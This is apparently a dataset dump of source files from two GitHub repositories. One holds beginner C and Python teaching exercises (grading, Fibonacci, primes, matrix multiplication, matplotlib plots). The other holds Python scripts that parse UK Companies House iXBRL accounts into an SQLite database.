0.3006211221218109, "alphanum_fraction": 0.31677019596099854, "avg_line_length": 16.866666793823242, "blob_id": "6fae252c9b19c3d27b1390b2e79f94bb7a9be42e", "content_id": "1fe19fe83000ee0752798b81ea4da4546c2d3805", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 805, "license_type": "no_license", "max_line_length": 92, "num_lines": 45, "path": "/week-2/grading.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nA simple C program for a simple grading system. This program can be done in many other ways\n\n*/\n\n#include<stdio.h>\n\n\nint main(){\n int mark;\n printf(\"Enter your mark: \");\n scanf(\"%d\",&mark);\n\n if(mark >100 || mark <0){\n printf(\"Invalid input\");\n }\n else{\n if(mark>=80){\n printf(\"A+\");\n }\n else{\n if(mark>=70){\n printf(\"A\");\n }\n else{\n if(mark>=50)\n {\n printf(\"B\");\n }\n else{\n if(mark >=33){\n printf(\"C\");\n }\n else{\n printf(\"F\");\n }\n }\n\n }\n }\n\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.7111111283302307, "avg_line_length": 14, "blob_id": "7903b773f854c787bfb8e6b4ff33e9cfe726b036", "content_id": "15a8446a4fa0fbe27915bb281a83cf2a4fb02d4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45, "license_type": "no_license", "max_line_length": 31, "num_lines": 3, "path": "/python/week-4/matplot.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\n\nprint \"***\"\n" }, { "alpha_fraction": 0.2745535671710968, "alphanum_fraction": 0.3549107015132904, "avg_line_length": 11.416666984558105, "blob_id": "5a0743f3b838fc3c2d55fff4017a786df9ff6bfc", "content_id": "d0139c460c5740f84fae8e70b8447e570ddf2a5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 448, "license_type": "no_license", "max_line_length": 35, "num_lines": 36, "path": "/week-5/2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nsample:\nn=5\n\n 1\n 131\n 13531\n 1357531\n135797531\n\n*/\n\n#include<stdio.h>\n\nint main()\n{\n int i,j,k,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n for(i=1;i<=n;i++){\n for(j=1;j<=n-i;j++){\n printf(\" \");\n }\n for(j=1;j<=(2*i)-1;j+=2){\n printf(\"%d\",j);\n }\n\n for(k=j-4;k>=1;k-=2){\n printf(\"%d\",k);\n }\n printf(\"\\n\");\n }\n\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.48202958703041077, "alphanum_fraction": 0.4947145879268646, "avg_line_length": 17.7227725982666, "blob_id": "17d6ca264f49a836331a54215c7d2c2356631196", "content_id": "3910211032f239631ac4dec56e8f4c8921f547f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1892, "license_type": "no_license", "max_line_length": 56, "num_lines": 101, "path": "/week-9/project.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nSkeleton for a fake telephone book software\n*/\n\n\n#include<stdio.h>\n#include<string.h>\n#define SIZE 1000\n\nint options();\nvoid insert();\nvoid delete_person();\nvoid update();\nvoid show();\nvoid search();\n\nint ind=0;\nstruct person{\n int age;\n char name[50];\n char phone[30];\n}contact[SIZE];\n\nint options(){\n int option;\n char c;\n printf(\"###################\\n\");\n printf(\"Insert: 1\\n\");\n printf(\"Delete: 2\\n\");\n printf(\"Update: 3\\n\");\n printf(\"Search: 4\\n\");\n printf(\"Show: 5\\n\");\n printf(\"Exit: 6\\n\");\n printf(\"###################\\n\");\n printf(\"Selection an option:\");\n scanf(\"%d\",&option);\n //this is to read the tangling new line\n scanf(\"%c\",&c);\n if(option==1)\n insert();\n else if(option==2)\n delete_person();\n else if(option==3)\n update();\n else if(option==4)\n search();\n else if(option==5)\n show();\n else if (option == 6)\n return 0;\n}\n\nvoid insert(){\n char c;\n printf(\"\\n\\n#######################\\n\");\n printf(\"Enter name:\");\n scanf(\"%[^\\n]\",contact[ind].name);\n printf(\"Enter age:\");\n scanf(\"%d\",&contact[ind].age);\n scanf(\"%c\",&c);\n printf(\"Enter phone number:\");\n scanf(\"%[^\\n]\",contact[ind].phone);\n ind++;\n printf(\"#######################\\n\");\n options();\n}\n\nvoid delete_person(){\n printf(\"I am delete\\n\");\n options();\n}\nvoid update(){\n printf(\"I am update\\n\");\n options();\n}\n\nvoid search(){\n printf(\"I am search\\n\");\n options();\n}\n\nvoid show(){\n int i;\n printf(\"\\n\\n####################\\n\\n\");\n for(i=0;i<ind;i++){\n printf(\"Name: %s\\n\",contact[i].name);\n printf(\"Age: %d\\n\",contact[i].age);\n printf(\"Phone number: %s\\n\\n\",contact[i].phone);\n }\n options();\n}\n\nvoid exit(){\n printf(\"I am exit\\n\");\n options();\n}\n\nint main(){\n options();\n return 0;\n}\n\n" }, { "alpha_fraction": 0.48170730471611023, "alphanum_fraction": 0.5152438879013062, "avg_line_length": 14.571428298950195, "blob_id": "e914a143e7e4855439824f35e76ba7eb0075e215", "content_id": "d88e47f20ac87fa1e7acdd1ba990833a6b9b01cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 328, "license_type": "no_license", "max_line_length": 54, "num_lines": 21, "path": "/week-2/leap-year.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nA simple C program for checking leap year\n*/\n\n#include<stdio.h>\n\nint main(){\n\n int year;\n printf(\"Enter the year: \");\n scanf(\"%d\",&year);\n\n if(year%4==0 && ((year%100!=0) || (year%400==0))){\n printf(\"This is a leap year\");\n }\n else{\n printf(\"This is not a leap year\");\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.6126629710197449, "alphanum_fraction": 0.6890130639076233, "avg_line_length": 20.479999542236328, "blob_id": "fb50f0f51dd72e29ec1bd8b49f32f7fd5029c1fa", "content_id": "72f93feda9a989f1eefc4436d6b8e70eaaedcf5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 537, "license_type": "no_license", "max_line_length": 44, "num_lines": 25, "path": "/python/week-4/line_graph.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nx=[1,2,3,4,5]\ny=[10,20,6,100,10000]\n\n\nline = plt.plot(x,y)\nplt.setp(line,color=\"b\",linewidth=3,ls=\"--\",\nmarker=\"D\",markersize=\"10\")\nfor label in ax.get_xticklabels():\n\t\tlabel.set_fontsize(20)\nfor label in ax.get_yticklabels():\n \t\tlabel.set_fontsize(20)\n\nplt.title(\"Test graph\",fontsize=18)\nplt.xlabel(\"Some x values\",fontsize=18)\nplt.ylabel(\"Some Y values\",fontsize=18)\nplt.grid(True)\n\n#ax.set_ylim(6, 1000)\n#ax.set_xlim(1, 5)\nax.set_yscale('log')\nplt.show()\n" }, { "alpha_fraction": 0.4570637047290802, "alphanum_fraction": 0.48476454615592957, "avg_line_length": 14.65217399597168, "blob_id": "89daa0d0fa198616a1ebd91e64b08cbd23fda885", "content_id": "1446da478ba16b0a34526b4b49bf6c3b0377a939", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 361, "license_type": "no_license", "max_line_length": 39, "num_lines": 23, "path": "/week-5/3.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nReverse a number without leading zeros.\n*/\n#include<stdio.h>\n\nint main()\n{\n int remainder, track=0, n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n while(n!=0){\n\n remainder=n%10;\n n=n/10;\n if (remainder==0 && track==0){\n continue;\n }\n track=1;\n printf(\"%d\", remainder);\n }\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.36624205112457275, "alphanum_fraction": 0.3980891704559326, "avg_line_length": 13.904762268066406, "blob_id": "e3f5c7b7e34aa46bb321f8461852cacaad5c763c", "content_id": "6768ba6f8217ab6933d1ca2dc945b8b1a02da31a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 314, "license_type": "no_license", "max_line_length": 39, "num_lines": 21, "path": "/week-3/p1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/* 3n+1 problem\n*/\n#include<stdio.h>\nint main(){\n int steps=0, n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n while(n!=1){\n steps++;\n if(n%2==0){\n n=n/2;\n }\n else{\n n=3*n+1;\n }\n\n }\n\n printf(\"Number of steps=%d\",steps);\n return 0;\n}\n\n" }, { "alpha_fraction": 0.4015151560306549, "alphanum_fraction": 0.4583333432674408, "avg_line_length": 10.954545021057129, "blob_id": "0f397c25fbed5c3e3e65f6a5d9c14903f1f31d60", "content_id": "7fa2b835d900c21bc24236333b1d995501b62456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 264, "license_type": "no_license", "max_line_length": 31, "num_lines": 22, "path": "/week-5/4_2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nFinding nth fibonacci number\n*/\n#include<stdio.h>\n\nint main()\n{\n int f1=1,f2=0,f3, i,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n\n for(i=1;i<=n;i++){\n f3=f1+f2;\n f1=f2;\n f2=f3;\n }\n printf(\"%d\",f3);\n\n\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.3787234127521515, "alphanum_fraction": 0.4234042465686798, "avg_line_length": 15.75, "blob_id": "81507d09d1603164db7cdf6c73c0a292bceb2220", "content_id": "94f57d2bce1d1555c7c2bce3deec65df8f08c065", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 470, "license_type": "no_license", "max_line_length": 35, "num_lines": 28, "path": "/week-4/4.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nPrint all the prime numbers up to n\nsample input:\nn=20\nsample output:\n2 3 5 7 11 13 17 19\n*/\n#include<stdio.h>\n#include<math.h>\nint main(){\n int i,j,n,track;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n for(i=2;i<=n;i++){\n track=0;\n for(j=2;j<=sqrt(i);j++){\n\n if(i%j==0){\n track=1;\n break;\n }\n }\n if(track==0){\n printf(\"%d \",i);\n }\n }\n return 0;\n}\n\n" }, { "alpha_fraction": 0.7319587469100952, "alphanum_fraction": 0.7731958627700806, "avg_line_length": 15.166666984558105, "blob_id": "e280d1cf3581a6bff6773ea7549e73333db60a29", "content_id": "0dbed52a67e81742fafb02f705590fc2a424bffc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 97, "license_type": "no_license", "max_line_length": 36, "num_lines": 6, "path": "/python/week-4/main.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import calculator.calculation as cal\n\nsm=cal.add(5,6)\nprint sm\nmult=cal.multiply(5,6)\nprint mult\n" }, { "alpha_fraction": 0.6772777438163757, "alphanum_fraction": 0.688803493976593, "avg_line_length": 20.186046600341797, "blob_id": "4c5991984fa3f3e5c29040549a6abaf8629de7c3", "content_id": "bee4b57c02034207ae906e91285ab4a95176b585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1822, "license_type": "no_license", "max_line_length": 57, "num_lines": 86, "path": "/python/week-2/program.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nfr=open(\"stats/bangladesh/tamim/years/all.txt\",\"r\")\n\nline=fr.readline()\n\nlines=fr.readlines()\ntamim_years=[]\ntamim_avgs=[]\nfor line in lines:\n\tdata=line.strip().split(\"\\t\")\n\tyear=data[0].strip()\n\tavg=data[9].strip()\n\tif year.isdigit():\n\t\ttamim_years.append(int(year))\n\t\ttamim_avgs.append(float(avg))\n\n\nfr=open(\"stats/bangladesh/mushfiq/years/all.txt\",\"r\")\n\nline=fr.readline()\n\nlines=fr.readlines()\nmushfiq_years=[]\nmushfiq_avgs=[]\nfor line in lines:\n\tdata=line.strip().split(\"\\t\")\n\tyear=data[0].strip()\n\tavg=data[9].strip()\n\tif year.isdigit():\n\t\tmushfiq_years.append(int(year))\n\t\tmushfiq_avgs.append(float(avg))\n\nfr=open(\"stats/bangladesh/mahmudullah/years/all.txt\",\"r\")\n\nline=fr.readline()\n\nlines=fr.readlines()\nmahmud_years=[]\nmahmud_avgs=[]\nfor line in lines:\n\tdata=line.strip().split(\"\\t\")\n\tyear=data[0].strip()\n\tavg=data[9].strip()\n\tif year.isdigit():\n\t\tmahmud_years.append(int(year))\n\t\tmahmud_avgs.append(float(avg))\n\nfr=open(\"stats/india/kohli/years/all.txt\",\"r\")\n\nline=fr.readline()\n\nlines=fr.readlines()\nkohli_years=[]\nkohli_avgs=[]\nfor line in lines:\n\tdata=line.strip().split(\"\\t\")\n\tyear=data[0].strip()\n\tavg=data[9].strip()\n\tif year.isdigit():\n\t\tkohli_years.append(int(year))\n\t\tkohli_avgs.append(float(avg))\n\n\n\nplt.plot(tamim_years, tamim_avgs, ls=\"--\")\nplt.plot(mushfiq_years, mushfiq_avgs, ls =\"-\")\nplt.plot(mahmud_years, mahmud_avgs, ls =\":\")\nplt.plot(kohli_years, kohli_avgs, ls =\"-.\")\n\nplt.xlabel('Year',fontsize=18)\nplt.ylabel('Average runs',fontsize=18)\nplt.legend(('Tamim', 'Mushfiq', 'Mahmudullah', 'Kohli'))\n\nleg = plt.gca().get_legend()\nltext = leg.get_texts()\nplt.setp(ltext, fontsize=20)\n\nfor label in ax.get_xticklabels():\n\tlabel.set_fontsize(14)\nfor label in ax.get_yticklabels():\n\tlabel.set_fontsize(15)\n\nplt.show()\n" }, { "alpha_fraction": 0.45126354694366455, "alphanum_fraction": 0.4909747242927551, "avg_line_length": 13.526315689086914, "blob_id": "8f32e0ce2af5b86dbfd3d9d53552506ea4844185", "content_id": "5c17e59f988f64f49b4b9d5c797bed14b2517945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 277, "license_type": "no_license", "max_line_length": 43, "num_lines": 19, "path": "/week-3/p4.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/* for n=5\noutput: 1 3 6 10 15\n\nDon't worry if you could not solve it yet. \n\n*/\n#include<stdio.h>\nint main(){\n int i, n, sum=0;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n\n for(i=1;i<=n;i++){\n sum=sum+i;\n printf(\"%d \",sum);\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.39840638637542725, "alphanum_fraction": 0.42031872272491455, "avg_line_length": 14.181818008422852, "blob_id": "ab078afd657fa5d7f1f8f0cc6e2aabc8ece9162e", "content_id": "b7c9d0fbbbad9b801bbc5ed8147bcd37f8d56a8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 502, "license_type": "no_license", "max_line_length": 43, "num_lines": 33, "path": "/week-6/p2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nCounting individual numbers\n*/\n\n#include<stdio.h>\n\nint main(){\n int n, a[20], count[20], i, number;\n printf(\"How many numbers?: \");\n scanf(\"%d\",&n);\n printf(\"Enter %d numbers \", n);\n\n for(i=0;i<n;i++){\n scanf(\"%d\",&a[i]);\n }\n\n for(i=0;i<n;i++){\n count[i]=0;\n }\n\n for(i=0;i<n;i++){\n number=a[i];\n count[number]++;\n }\n\n for(i=0;i<n;i++){\n if(count[i]>0){\n printf(\"%d = %d\\n\",i,count[i]);\n }\n }\n return 0;\n\n}\n\n" }, { "alpha_fraction": 0.3489736020565033, "alphanum_fraction": 0.3988269865512848, "avg_line_length": 12.600000381469727, "blob_id": "8344a6d7c3fe59ee546bd2ff7a3437849d0639ee", "content_id": "fcd88f770e6096fdf32819df113d912fa442b184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 341, "license_type": "no_license", "max_line_length": 31, "num_lines": 25, "path": "/week-5/4_1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nFinding nth fibonacci number\n*/\n#include<stdio.h>\n\nint main()\n{\n int f1=1,f2=1,f3, i,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n if(n<=2){\n printf(\"1\");\n }\n else{\n for(i=3;i<=n;i++){\n f3=f1+f2;\n f1=f2;\n f2=f3;\n }\n printf(\"%d\",f3);\n }\n\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.42465752363204956, "alphanum_fraction": 0.4292237460613251, "avg_line_length": 11.485713958740234, "blob_id": "6a36831ab88efc25408e03a0ba854c655bc88d21", "content_id": "f5974048463a41c76196362ebf30d21738263e54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 438, "license_type": "no_license", "max_line_length": 34, "num_lines": 35, "path": "/week-5/5.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nGCD and LCM of two numbers\n\n*/\n#include<stdio.h>\n\nint main()\n{\n int max, min,x,y, tmp,lcm;\n printf(\"Enter two numbers: \");\n scanf(\"%d%d\",&x,&y);\n\n if(x<y){\n min=x;\n max=y;\n }\n\n else{\n min=y;\n max=x;\n }\n\n while(min!=0){\n tmp=min;\n min=max%min;\n max=tmp;\n }\n\n lcm = (x*y)/max;\n\n printf(\"GCD is: %d\\n\", max);\n printf(\"LCM is: %d\", lcm);\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.3624577224254608, "alphanum_fraction": 0.39515221118927, "avg_line_length": 21.443037033081055, "blob_id": "33df21ef0a03e1b3ebcf972185fb170a2c1cd1ed", "content_id": "f97f8c9d80cf414981da209926ceac0043850676", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1774, "license_type": "no_license", "max_line_length": 72, "num_lines": 79, "path": "/week-9/1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nmatrix multiplication\n*/\n\n#include<stdio.h>\n\nint main(){\n int a[20][20],b[20][20],c[20][20],i,j,k,sum, row1, col1, row2, col2;\n printf(\"Number of rows for matrix 1:\");\n scanf(\"%d\",&row1);\n printf(\"Number of columns for matrix 1:\");\n scanf(\"%d\",&col1);\n printf(\"\\n\\nNumber of rows for matrix 2:\");\n scanf(\"%d\",&row2);\n printf(\"Number of columns for matrix 2:\");\n scanf(\"%d\",&col2);\n if(col1!=row2){\n printf(\"Matrix multiplication is not possible\");\n }\n else{\n printf(\"\\nEnter the first matrix (%d*%d)\\n\",row1,col1);\n for(i=0;i<row1;i++){\n for(j=0;j<col1;j++){\n scanf(\"%d\",&a[i][j]);\n }\n\n }\n printf(\"\\nEnter the second matrix (%d*%d)\\n\",row2,col2);\n\n for(i=0;i<row2;i++){\n for(j=0;j<col2;j++){\n scanf(\"%d\",&b[i][j]);\n }\n\n }\n\n //we start the multiplication now\n for(i=0;i<row1;i++){\n for(j=0;j<col2;j++){\n sum=0;\n for(k=0;k<col1;k++){\n sum+=a[i][k]*b[k][j];\n }\n c[i][j]=sum;\n }\n\n }\n\n printf(\"\\nThe first matrix is:\\n\");\n\n for(i=0;i<row1;i++){\n for(j=0;j<col1;j++){\n printf(\"%d \",a[i][j]);\n }\n printf(\"\\n\");\n }\n\n printf(\"\\nThe second matrix is:\\n\");\n\n for(i=0;i<row2;i++){\n for(j=0;j<col2;j++){\n printf(\"%d \",b[i][j]);\n }\n printf(\"\\n\");\n\n }\n\n printf(\"\\nThe result is:\\n\");\n\n for(i=0;i<row1;i++){\n for(j=0;j<col2;j++){\n printf(\"%d \",c[i][j]);\n }\n printf(\"\\n\");\n }\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.3360433578491211, "alphanum_fraction": 0.39024388790130615, "avg_line_length": 10.5, "blob_id": "23e7a4fc66c52300f2384da655362bd0b0c6bac2", "content_id": "263088299de10255868b4d37eb713f81df8886b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 369, "license_type": "no_license", "max_line_length": 31, "num_lines": 32, "path": "/week-4/2_reverse.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nsample input:\nn=5\nsample output:\n\n55555\n 4444\n 333\n 22\n 1\n\n\n*/\n#include<stdio.h>\nint main(){\n int i,j,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n for(i=n;i>=1;i--){\n\n for(j=1;j<=n-i;j++){\n printf(\" \");\n }\n for(j=1;j<=i;j++){\n printf(\"%d\",i);\n\n }\n printf(\"\\n\");\n\n }\n return 0;\n}\n\n" } ]
31
DIT-Data/coho_accounts
https://github.com/DIT-Data/coho_accounts
06b6c6304958b40957c043c49d1085cac582c653
baccb22a0801e57db5bed0bfe8b5d075485fbf27
934051889b5d969090a13d8534dfee6cabafc6ed
refs/heads/master
2020-04-07T13:37:23.302924
2019-01-14T15:08:29
2019-01-14T15:08:29
158,414,511
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.581404447555542, "alphanum_fraction": 0.5908199548721313, "avg_line_length": 37.621212005615234, "blob_id": "ae4c763c01132bf4bb8249476461b927c254eb11", "content_id": "55ecf4dcd484a50f26f9407119f7c3a012d381e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5100, "license_type": "no_license", "max_line_length": 116, "num_lines": 132, "path": "/run_xbrli.py", "repo_name": "DIT-Data/coho_accounts", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport os\nimport pandas as pd\nfrom datetime import datetime\nimport sqlalchemy\nimport shutil\n\ndef add_column(engine, table_name, column):\n column_name = column.compile(dialect=engine.dialect)\n column_type = column.type.compile(engine.dialect)\n engine.execute('ALTER TABLE %s ADD COLUMN %s %s' % (table_name, column_name, column_type))\n\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s %s/%s' % (prefix, bar, percent, suffix, iteration, total), end = '', flush=True)\n # Print New Line on Complete\n if iteration == total:\n print()\n\n# Getting directory names\ninput_dir = \"input/\"\ncomplete_dir = \"complete/\"\ncurrent_dir = os.getcwd()\n\n# Create or connect to Database\ndb = sqlalchemy.create_engine(r'sqlite:///'+current_dir+'/chfin.db', echo=False)\n\n# Counters for progress bar\ni = 0\nl = len(os.listdir(input_dir))\n\n# Initialize progressbar\nprintProgressBar(0, l)\nfor filename in os.listdir(input_dir):\n # Update progress bar once every 100 files\n if i % 100 == 0:\n printProgressBar(i + 1, l)\n i += 1\n\n # Extracting date and companies house number\n day = filename[-7:-5]\n month = filename[-9:-7]\n year = filename[-13:-9]\n chn = filename[-22:-14]\n\n # Opening file and looping through figures available\n soup = BeautifulSoup(open(\"%s%s\" % (input_dir, filename), encoding='utf-8'), \"html.parser\")\n figures = soup.find_all(name=\"ix:nonfraction\")\n out_dict = {}\n\n # Fixing Column Name and changing format of figures\n\n for fig in figures:\n tag_name = fig[\"name\"].split(\":\")[-1]\n contextref = fig[\"contextref\"]\n context = soup.find(name=\"xbrli:context\", id=contextref)\n if context is not None:\n\n end_date = context.find(name=\"xbrli:instant\")\n start_date = None\n if end_date is None:\n start_date = context.find(name=\"xbrli:startdate\").text\n end_date = context.find(name=\"xbrli:enddate\").text\n else:\n end_date = end_date.text\n\n out_dict.setdefault(end_date, {})\n if start_date is not None:\n out_dict[end_date].setdefault(\"start_date\", [start_date])\n out_dict[end_date].setdefault(\"end_date\", [end_date])\n\n segment = context.find(name=\"xbrli:segment\")\n key_name = tag_name\n if segment is not None:\n segment_text = segment.getText().split(\":\")[-1]\n key_name = tag_name + \":\" + segment_text\n\n # Multiplying by scale and check if value should be negative\n multiplier = 1\n if fig.has_attr('sign'):\n if fig['sign'] == \"-\":\n multiplier = -1\n if fig.has_attr('scale'):\n if int(fig['scale']) > 0:\n multiplier = multiplier * (10 ** int(fig['scale']))\n print(filename)\n # if fig.has_attr('decimals'):\n # if fig['decimals'] == \"INF\":\n # multiplier = multiplier * 0.01\n value = float(fig.text.replace(',', '').replace('-', \"0\"))\n out_dict[end_date].setdefault(key_name, [\"\"])[0] = value * multiplier\n\n # # Removing additional entries, only including current and previous year figures\n # for key in out_dict:\n # out_dict[key] = out_dict[key][:2]\n\n # Adding Companies house number and filename to pandas df for reference. Adding any missing columns to sql table\n # and appending dataframe to sql db.\n for key in out_dict:\n out_pd = pd.DataFrame.from_dict(out_dict[key], orient='columns')\n out_pd[\"chn\"] = chn\n out_pd[\"file_name\"] = filename\n\n # Adding any previously missing column into the sqlite database\n\n if db.dialect.has_table(db, \"fin\"):\n for col in out_pd:\n if col not in db.execute(\"SELECT * FROM fin LIMIT 1\").keys():\n new_col = sqlalchemy.Column(col, sqlalchemy.FLOAT)\n add_column(db, \"fin\", new_col)\n\n # Appending data from DataFrame into sqlite database\n out_pd.to_sql(\"fin\", con=db, if_exists='append', index=False)\n del out_dict\n\n # Moving file into the complete dir\n shutil.move(input_dir + filename, complete_dir)\n\nprintProgressBar(1, 1)\n" }, { "alpha_fraction": 0.7551020383834839, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 17.375, "blob_id": "5f25dc9c41429e131b8b75dc81b9622969827548", "content_id": "d795ef89db29e8ec1042658e610963cd54283d30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 147, "license_type": "no_license", "max_line_length": 21, "num_lines": 8, "path": "/requirements.txt", "repo_name": "DIT-Data/coho_accounts", "src_encoding": "UTF-8", "text": "beautifulsoup4==4.6.3\npandas==0.23.4\nKNime / RapidMiner\nTechnology scraper:\nLinkedIn scraper:\nFacebook scraper:\nParsehub/Octoparse\nAtomic or alike\n" }, { "alpha_fraction": 0.5750459432601929, "alphanum_fraction": 0.5854604840278625, "avg_line_length": 36.38167953491211, "blob_id": "97118272cbc6cd153b812bcb9a2dc771356b55e3", "content_id": "c09a08fcd1e667133d7edc28d671bca4de14bb50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4899, "license_type": "no_license", "max_line_length": 109, "num_lines": 131, "path": "/run2.py", "repo_name": "DIT-Data/coho_accounts", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nimport os\nimport pandas as pd\nfrom datetime import datetime\nimport sqlalchemy\nimport shutil\n\ndef add_column(engine, table_name, column):\n column_name = column.compile(dialect=engine.dialect)\n column_type = column.type.compile(engine.dialect)\n engine.execute('ALTER TABLE %s ADD COLUMN %s %s' % (table_name, column_name, column_type))\n\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s %s/%s' % (prefix, bar, percent, suffix, iteration, total), end = '', flush=True)\n # Print New Line on Complete\n if iteration == total:\n print()\n\n# Getting directory names\ninput_dir = \"input/\"\ncomplete_dir = \"complete/\"\ncurrent_dir = os.getcwd()\n\n# Create or connect to Database\ndb = sqlalchemy.create_engine(r'sqlite:///'+current_dir+'/chfin.db', echo=False)\n\n# Counters for progress bar\ni = 0\nl = len(os.listdir(input_dir))\n\n# Initialize progressbar\nprintProgressBar(0, l)\nfor filename in os.listdir(input_dir):\n # Update progress bar once every 100 files\n if i % 100 == 0:\n printProgressBar(i + 1, l)\n i += 1\n\n # Extracting date and companies house number\n day = filename[-7:-5]\n month = filename[-9:-7]\n year = filename[-13:-9]\n chn = filename[-22:-14]\n\n # Opening file and looping through figures available\n soup = BeautifulSoup(open(\"%s%s\" % (input_dir, filename), encoding='utf-8'), \"html.parser\")\n table_rows = soup.find_all(name=\"tr\")\n out_dict = {}\n name_checker = {}\n\n for table_row in table_rows:\n\n if len(table_row.find_all(name=\"span\")) > 0:\n\n figures = table_row.find_all(name=\"ix:nonfraction\")\n\n if len(figures) > 0:\n if len(table_row.find_all(name=\"p\")) > 0:\n tr_name = table_row.find_all(name=\"p\")[0].text\n else:\n tr_name = table_row.find_all(name=\"span\")[0].text\n\n # Fixing Column Name and changing format of figures\n # TODO: Check if there are more names than just one. If yes, assign contextref.\n\n for fig in figures:\n key_name = fig[\"name\"].split(\":\")[-1]\n name_checker.setdefault(key_name, 0)\n name_checker[key_name] += 1\n\n for fig in figures:\n key_name = 